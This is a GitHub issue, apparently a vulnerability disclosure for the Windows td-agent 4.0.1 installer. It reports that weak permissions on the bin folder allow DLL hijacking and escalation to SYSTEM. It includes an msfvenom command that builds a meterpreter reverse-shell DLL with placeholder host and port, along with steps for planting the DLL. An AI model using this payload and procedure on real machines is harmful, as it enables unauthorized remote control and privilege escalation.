Skip to content

Possible Vulnerability #3201

Closed
Closed
@zubrahzz

Description

@zubrahzz

POC.docx
Describe the bug
Inappropriate folder permissions, possible escalation of privileges' on Windows

To Reproduce
Download URL:
http://packages.treasuredata.com.s3.amazonaws.com/4/windows/td-agent-4.0.1-x64.msi
Vulnerable Path:
C:\opt\td-agent\bin

Steps in reproducing the exploit:
Creating a DLL containing a reverse shell with the specific name that ruby.exe will search:
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=IPADRRESS LPORT=PORT > CRYPTBASE.dll
Setting up MSF console to listen for connection.
Copying the DLL file that we created to “C:\opt\td-agent\bin” using a limited account:
Normally, a limited user might not have the possibility of restarting the service.
A potential attacker can wait for the service to be restarted or he can restart the machine from command line; when the service restarts, it will trigger the DLL and get NT Authority.

Expected behavior
N/A

Your Environment
Windows10

If you hit the problem with older fluentd version, try latest version first.

Your Configuration

Default

Your Error Log

No errors.
Additional context

Please add an appropriate contact method to submit possible vulnerabilities and POC's.

Metadata

Metadata

Assignees

Labels

bugSomething isn't workingwindows

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions